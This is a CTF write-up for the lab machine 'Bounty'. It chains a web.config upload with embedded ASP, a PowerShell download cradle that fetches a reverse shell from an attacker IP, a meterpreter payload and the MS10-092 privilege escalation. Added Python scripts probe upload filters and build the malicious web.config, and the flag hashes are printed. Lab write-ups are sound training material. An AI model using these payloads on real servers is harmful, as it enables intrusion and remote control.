
[Meachines] [Easy] bounty: web.config file-upload code injection + MS10-092 privilege escalation

2024/12/23 10:18:00  Source: https://blog.csdn.net/qq_51886509/article/details/141365780

Information gathering

IP Address     Open Ports
10.10.10.93    TCP:80

$ nmap -p- 10.10.10.93 --min-rate 1000 -sC -sV

PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 7.5
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Bounty
| http-methods:
|_  Potentially risky methods: TRACE
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

HTTP


$ feroxbuster -u http://10.10.10.93/ -x asp,aspx,txt -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k -t 100 -s 200,301 -n


web.config code injection & PowerShell reverse shell


But browsing to http://10.10.10.93/UploadedFiles/buff.aspx does not give us command execution…

Brute-force the file extension with Burp first; this shows that files with a .config extension are allowed through.
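The Burp extension brute-force above, automated against an ASP.NET upload form. This is an added example and not code from the original write-up: `UPLOAD_URL` is a placeholder for the upload page found with feroxbuster, the form field names are read from the page's own HTML rather than hard-coded, and `BASELINE_EXT` is assumed to be an extension the server rejects so that every other response can be compared against it. The sample form embedded in the script is constructed for the offline checks, not captured from the target.

```python
"""Probe which file extensions an upload form lets through.

Added example, not from the original write-up: it automates the Burp
extension brute-force described above against an ASP.NET upload form.
UPLOAD_URL is a placeholder (the real upload page is the one found with
feroxbuster); the form field names are read from the page itself.
"""
import re
import sys
import urllib.request
from html.parser import HTMLParser

UPLOAD_URL = "http://10.10.10.93/upload.aspx"  # placeholder, not the real page name
CANDIDATES = ["aspx", "asp", "ashx", "asmx", "cer", "soap", "config", "txt", "jpg"]
BASELINE_EXT = "exe"  # assumed to be rejected; its response is the "rejected" reference

# Constructed sample of an ASP.NET upload form (not the target's real page)
SAMPLE_FORM = (
    '<form method="post" enctype="multipart/form-data">'
    '<input type="hidden" name="__VIEWSTATE" value="dDwxMjM0" />'
    '<input type="file" name="FileUpload1" id="FileUpload1" />'
    '<input type="submit" name="btnUpload" value="Upload" />'
    '</form>'
)


class FormParser(HTMLParser):
    """Collect hidden/submit fields (__VIEWSTATE etc.) and the file input name."""

    def __init__(self):
        super().__init__()
        self.fields = {}
        self.file_field = None

    def handle_starttag(self, tag, attrs):
        if tag != "input":
            return
        a = dict(attrs)
        name, typ = a.get("name"), (a.get("type") or "text").lower()
        if not name:
            return
        if typ == "file":
            self.file_field = name
        else:
            self.fields[name] = a.get("value") or ""


def parse_form(html):
    p = FormParser()
    p.feed(html)
    return p.fields, p.file_field


def build_multipart(fields, file_field, filename, content, boundary="----probe7f3a"):
    """Minimal multipart/form-data encoder (urllib has none built in)."""
    parts = []
    for k, v in fields.items():
        parts.append(f'--{boundary}\r\nContent-Disposition: form-data; name="{k}"\r\n\r\n{v}\r\n')
    parts.append(
        f'--{boundary}\r\nContent-Disposition: form-data; name="{file_field}"; '
        f'filename="{filename}"\r\nContent-Type: application/octet-stream\r\n\r\n'
    )
    body = "".join(parts).encode() + content + f"\r\n--{boundary}--\r\n".encode()
    return body, f"multipart/form-data; boundary={boundary}"


def normalise(html):
    """Blank out per-request hidden values so two responses can be compared."""
    return re.sub(r'value="[^"]*"', 'value=""', html)


def post_upload(url, fields, file_field, filename, content):
    body, ctype = build_multipart(fields, file_field, filename, content)
    req = urllib.request.Request(url, data=body, headers={"Content-Type": ctype})
    with urllib.request.urlopen(req, timeout=10) as r:
        return r.read().decode(errors="replace")


def probe(url, candidates):
    """Return the extensions whose response differs from the rejected baseline."""
    page = urllib.request.urlopen(url, timeout=10).read().decode(errors="replace")
    fields, file_field = parse_form(page)
    rejected = normalise(post_upload(url, fields, file_field, f"probe.{BASELINE_EXT}", b"probe"))
    return [ext for ext in candidates
            if normalise(post_upload(url, fields, file_field, f"probe.{ext}", b"probe")) != rejected]


if __name__ == "__main__":
    print(probe(sys.argv[1] if len(sys.argv) > 1 else UPLOAD_URL, CANDIDATES))
```

Comparing against a rejected baseline instead of matching a fixed error string means the script does not need to know what the rejection message looks like; the cost is that any unrelated per-request change in the page (beyond `value="..."` attributes) shows up as a false positive, so verify each reported extension by hand before relying on it.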


<?xml version="1.0" encoding="UTF-8"?>
<configuration>
  <system.webServer>
    <handlers accessPolicy="Read, Script, Write">
      <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
    </handlers>
    <security>
      <requestFiltering>
        <fileExtensions>
          <remove fileExtension=".config" />
        </fileExtensions>
        <hiddenSegments>
          <remove segment="web.config" />
        </hiddenSegments>
      </requestFiltering>
    </security>
  </system.webServer>
</configuration>
<!-- ASP code comes here! It should not include HTML comment closing tag and double dashes!
<%
Response.write("-"&"->")
' it is running the ASP code if you can see 3 by opening the web.config file!
Response.write(1+2)
Response.write("<!-"&"-")
%>
-->

Upload this web.config and browse to http://10.10.10.93/uploadedfiles/web.config: the ASP code is executed.


$ wget https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1;echo 'Invoke-PowerShellTcp -Reverse -IPAddress 10.10.16.24 -Port 10032'>>Invoke-PowerShellTcp.ps1

Upload web.config again, this time carrying the download cradle for the reverse shell:

<?xml version="1.0" encoding="UTF-8"?>
<configuration>
  <system.webServer>
    <handlers accessPolicy="Read, Script, Write">
      <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
    </handlers>
    <security>
      <requestFiltering>
        <fileExtensions>
          <remove fileExtension=".config" />
        </fileExtensions>
        <hiddenSegments>
          <remove segment="web.config" />
        </hiddenSegments>
      </requestFiltering>
    </security>
  </system.webServer>
</configuration>
<%@ Language=VBScript %>
<%
call Server.CreateObject("WSCRIPT.SHELL").Run("cmd.exe /c powershell.exe -c iex(new-object net.webclient).downloadstring('http://10.10.16.24/Invoke-PowerShellTcp.ps1')")
%>
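The two web.config payloads above differ in where the ASP lives: the first hides it inside an XML comment, which is why its header warns against `-->` and double dashes (an XML comment ends at the first `--`), while the second appends bare `<%@ ... %>` blocks after `</configuration>`, which is no longer well-formed XML. The script below is an added example, not code from the original write-up: it assembles the handler/requestFiltering block shown on this page, wraps the same nishang download cradle in the comment form, refuses payloads that would break the comment, and checks that the result still parses before it is uploaded. `lhost` and the script name are parameters; the default value is the attacker address used in the write-up.

```python
"""Build and sanity-check the self-executing web.config used above.

Added example, not from the original write-up. It takes the handler /
requestFiltering block shown on this page, wraps an ASP payload in the XML
comment trick from the first payload, and refuses payloads that would break
that trick, so the file is checked before it is uploaded. The cradle it
emits is the nishang download line from the write-up; lhost is a parameter.
"""
import xml.etree.ElementTree as ET

CONFIG = r"""<?xml version="1.0" encoding="UTF-8"?>
<configuration>
  <system.webServer>
    <handlers accessPolicy="Read, Script, Write">
      <add name="web_config" path="*.config" verb="*" modules="IsapiModule"
           scriptProcessor="%windir%\system32\inetsrv\asp.dll"
           resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
    </handlers>
    <security>
      <requestFiltering>
        <fileExtensions><remove fileExtension=".config" /></fileExtensions>
        <hiddenSegments><remove segment="web.config" /></hiddenSegments>
      </requestFiltering>
    </security>
  </system.webServer>
</configuration>
"""


def payload_is_safe(asp_body):
    """An XML comment ends at the first '--', so the ASP placed inside it must
    not contain one (that is what the warning in the first payload means)."""
    return "--" not in asp_body


def build_web_config(asp_body):
    """Append the ASP inside an XML comment. The first Response.write emits
    '-->' so the browser leaves the HTML comment before the payload output;
    the last one emits '<!--' so the real closing '-->' is swallowed again."""
    if not payload_is_safe(asp_body):
        raise ValueError("ASP body contains '--', which would end the XML comment early")
    asp = ('<%\nResponse.write("-"&"->")\n'
           + asp_body.strip("\n") + '\n'
           'Response.write("<!-"&"-")\n%>')
    return CONFIG + "<!--\n" + asp + "\n-->\n"


def is_well_formed(text):
    """True if the file still parses as XML (the comment form keeps it so)."""
    try:
        ET.fromstring(text)
        return True
    except ET.ParseError:
        return False


def handler_path(text):
    """Read back the handler mapping to confirm *.config is routed to asp.dll."""
    add = ET.fromstring(text).find("./system.webServer/handlers/add")
    return add.get("path"), add.get("scriptProcessor")


def download_cradle(lhost, script="Invoke-PowerShellTcp.ps1"):
    """VBScript that runs the PowerShell download cradle from the write-up."""
    ps = f"iex(new-object net.webclient).downloadstring('http://{lhost}/{script}')"
    return ('Set sh = Server.CreateObject("WScript.Shell")\n'
            f'sh.Run "cmd.exe /c powershell.exe -c {ps}", 0, False')


if __name__ == "__main__":
    cfg = build_web_config(download_cradle("10.10.16.24"))
    assert is_well_formed(cfg)
    with open("web.config", "w", newline="\n") as f:
        f.write(cfg)
    print(cfg)
```

The `Run` call uses window style `0` and `False` (do not wait) so the request returns while the reverse shell stays up; the write-up's `call ...Run("...")` form does the same job.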

PS C:\users\merlin\desktop> gci -force


User.txt

be952a25cdc0106a03cbc3deb5d7fd19

Privilege escalation

> systeminfo


Local privilege escalation with Metasploit

$ msfconsole

msf6 > use exploit/multi/handler

msf6 exploit(multi/handler) > set PAYLOAD windows/x64/meterpreter/reverse_tcp

msf6 exploit(multi/handler) > set LHOST 0.0.0.0

msf6 exploit(multi/handler) > set LPORT 10033

msf6 exploit(multi/handler) > run

$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.16.24 LPORT=10033 -f psh -o recv.ps1

> iex(new-object net.webclient).downloadstring('http://10.10.16.24/recv.ps1')

> recv.ps1

meterpreter > bg


Look for usable local privilege-escalation exploits

msf6 > use multi/recon/local_exploit_suggester
msf6 post(multi/recon/local_exploit_suggester) > set session 2
msf6 post(multi/recon/local_exploit_suggester) > run


MS10-092 (Task Scheduler) privilege escalation

msf6 exploit(multi/handler) > use windows/local/ms10_092_schelevator

msf6 exploit(windows/local/ms10_092_schelevator) > set payload windows/x64/meterpreter/reverse_tcp

msf6 exploit(windows/local/ms10_092_schelevator) > set LHOST 10.10.16.24

msf6 exploit(windows/local/ms10_092_schelevator) > set session 2

msf6 exploit(windows/local/ms10_092_schelevator) > set AutoCheck false

msf6 exploit(windows/local/ms10_092_schelevator) > run
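With `AutoCheck false` the module skips its own vulnerability check, so it is worth doing the check by hand from the `systeminfo` output collected earlier. The script below is an added example, not part of the original write-up or of Metasploit: it does for this one bug what local_exploit_suggester does for many, flagging a host as a candidate for ms10_092_schelevator when it runs an affected OS (Vista / Server 2008 / Windows 7 / Server 2008 R2), KB2305420 is not listed, and the 6.1 Service Pack that rolled the fix up is absent. It also picks the payload architecture from `System Type`. All three `systeminfo` dumps in it are constructed samples, not output captured from the target.

```python
"""Pre-check for MS10-092 (Task Scheduler, fixed by KB2305420) from systeminfo.

Added example, not from the original write-up. local_exploit_suggester does
this kind of check for many modules at once; with AutoCheck false the
ms10_092_schelevator module skips its own, so this is the manual version
for one bug. All systeminfo dumps below are constructed samples, not output
captured from the target.
"""
import re

MS10_092_KB = "KB2305420"
# MS10-092 (December 2010) affects the Task Scheduler 2.0 family:
# Vista, Server 2008, Windows 7 and Server 2008 R2 (NT 6.0 / 6.1).
AFFECTED_OS = ("Windows Vista", "Windows Server 2008", "Windows 7")

SAMPLE_UNPATCHED = """\
Host Name:                 WEB01
OS Name:                   Microsoft Windows Server 2008 R2 Datacenter
OS Version:                6.1.7600 N/A Build 7600
System Type:               x64-based PC
Hotfix(s):                 N/A
"""

SAMPLE_PATCHED = """\
Host Name:                 WEB02
OS Name:                   Microsoft Windows Server 2008 R2 Standard
OS Version:                6.1.7600 N/A Build 7600
System Type:               x64-based PC
Hotfix(s):                 2 Hotfix(s) Installed.
                           [01]: KB976902
                           [02]: KB2305420
"""

SAMPLE_SP1 = """\
Host Name:                 WEB03
OS Name:                   Microsoft Windows 7 Enterprise
OS Version:                6.1.7601 Service Pack 1 Build 7601
System Type:               X86-based PC
Hotfix(s):                 N/A
"""


def parse_systeminfo(text):
    """Return the 'Key: value' pairs plus every KB number found anywhere."""
    info = {}
    for line in text.splitlines():
        m = re.match(r"^([A-Za-z][A-Za-z0-9 ()/]*?):\s+(.*)$", line)
        if m:
            info[m.group(1)] = m.group(2).strip()
    info["hotfixes"] = sorted(set(re.findall(r"\bKB\d{6,7}\b", text)))
    return info


def ms10_092_candidate(text):
    """(candidate?, arch, reason) for exploit/windows/local/ms10_092_schelevator."""
    info = parse_systeminfo(text)
    os_name = info.get("OS Name", "")
    version = info.get("OS Version", "")
    arch = "x64" if "x64" in info.get("System Type", "").lower() else "x86"
    if not any(a in os_name for a in AFFECTED_OS):
        return False, arch, f"{os_name or 'unknown OS'} is not in the MS10-092 affected set"
    if MS10_092_KB in info["hotfixes"]:
        return False, arch, f"{MS10_092_KB} is installed"
    # Service packs roll up earlier fixes and do not appear as KB entries:
    # Windows 7 / 2008 R2 SP1 (Feb 2011) already contains the MS10-092 fix.
    if version.startswith("6.1") and "Service Pack" in version:
        return False, arch, "6.1 SP1 already contains the MS10-092 fix"
    return True, arch, (f"{os_name} build {version.split()[0]} without {MS10_092_KB}: "
                        f"use ms10_092_schelevator with a windows/{arch} payload")


if __name__ == "__main__":
    for sample in (SAMPLE_UNPATCHED, SAMPLE_PATCHED, SAMPLE_SP1):
        print(ms10_092_candidate(sample))
```

Paste the real `systeminfo` output into `ms10_092_candidate` before setting `AutoCheck false`; a `True` result is the justification for skipping the module's own check, and the returned architecture is the one to use in `set payload windows/x64/...` or `windows/...`.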


Root.txt

2191c45301ab454267720c13689e9b8c
